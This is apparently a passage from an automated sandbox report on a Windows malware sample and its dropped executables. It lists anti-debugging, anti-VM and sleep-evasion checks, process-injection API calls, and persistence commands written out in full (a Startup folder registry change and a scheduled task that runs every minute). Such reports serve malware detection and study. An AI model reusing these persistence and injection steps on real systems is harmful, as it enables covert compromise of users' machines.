              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe TID: 3628Thread sleep count: 218 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe TID: 3628Thread sleep time: -39240000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe TID: 3532Thread sleep count: 199 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe TID: 3532Thread sleep time: -35820000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe TID: 6940Thread sleep count: 153 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe TID: 6940Thread sleep time: -38250s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe TID: 5212Thread sleep count: 131 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe TID: 5212Thread sleep time: -23580000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe TID: 2928Thread sleep count: 67 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe TID: 2928Thread sleep time: -12060000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe TID: 6892Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe TID: 3532Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe TID: 3628Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\mvoElayshk.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_01004010 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetSystemMetrics,3_2_01004010
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_0101B0C2 FindFirstFileExW,3_2_0101B0C2
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F1B0C2 FindFirstFileExW,5_2_00F1B0C2
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F1B0C2 FindFirstFileExW,11_2_00F1B0C2
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_00409931 ??2@YAPAXI@Z,FindFirstFileW,FindClose,13_2_00409931
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_00403327 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,13_2_00403327
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_00403442 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,13_2_00403442
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_00404402 FindFirstFileW,FindClose,SetLastError,CompareFileTime,13_2_00404402
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_00409931 ??2@YAPAXI@Z,FindFirstFileW,FindClose,16_2_00409931
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_00403327 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,16_2_00403327
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_00403442 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,16_2_00403442
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_00404402 FindFirstFileW,FindClose,SetLastError,CompareFileTime,16_2_00404402
              Source: C:\Users\user\Desktop\mvoElayshk.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeThread delayed: delay time: 30000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeThread delayed: delay time: 30000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\1sb1iwyem7Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.001Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
              Source: mvoElayshk.exe, 00000000.00000002.659314174.00000000007AD000.00000004.00000020.sdmpBinary or memory string: ~100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_01014AA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_01014AA3
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F0C0A0 Sleep,Sleep,LoadLibraryA,GetProcAddress,FreeLibrary,GetUserNameW,GetComputerNameExW,5_2_00F0C0A0
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_01001DA0 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,3_2_01001DA0
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_010121C1 mov eax, dword ptr fs:[00000030h]3_2_010121C1
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_01015F52 mov eax, dword ptr fs:[00000030h]3_2_01015F52
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F121C1 mov eax, dword ptr fs:[00000030h]5_2_00F121C1
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F15F52 mov eax, dword ptr fs:[00000030h]5_2_00F15F52
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F121C1 mov eax, dword ptr fs:[00000030h]11_2_00F121C1
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F15F52 mov eax, dword ptr fs:[00000030h]11_2_00F15F52
              Source: C:\Users\user\Desktop\mvoElayshk.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_01010567 SetUnhandledExceptionFilter,3_2_01010567
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_01014AA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_01014AA3
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_01010402 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_01010402
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_010107B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_010107B3
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F10567 SetUnhandledExceptionFilter,5_2_00F10567
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F14AA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00F14AA3
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F10402 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00F10402
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F107B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00F107B3
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F10567 SetUnhandledExceptionFilter,11_2_00F10567
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F14AA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00F14AA3
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F10402 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00F10402
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F107B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00F107B3

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Contains functionality to inject code into remote processesShow sources
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_01002250 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,3_2_01002250
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F02A20 ShellExecuteA,5_2_00F02A20
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe TaskKill /pid 6268 /t /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe TaskKill /pid 3184 /t /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe TaskKill /pid 4624 /t /f
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess created: C:\Users\user\AppData\Local\Temp\a.exe 'C:\Users\user\AppData\Local\Temp\a.exe' Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\a.exeProcess created: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe 'C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe' Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\4c423bc94e\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR 'C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe' /FJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeProcess created: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe' Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\4c423bc94e\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe' Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nhJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe TaskKill /pid 6268 /t /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe TaskList /fo CSV /nhJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe TaskList /fo CSV /nh
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe'
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe TaskKill /pid 3184 /t /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe TaskList /fo CSV /nh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe TaskList /fo CSV /nh
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe TaskKill /pid 4624 /t /f
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe TaskList /fo CSV /nh
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_00403F0A AllocateAndInitializeSid,CheckTokenMembership,FreeSid,13_2_00403F0A
              Source: C:\Users\user\Desktop\mvoElayshk.exeQueries volume information: C:\Users\user\Desktop\mvoElayshk.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
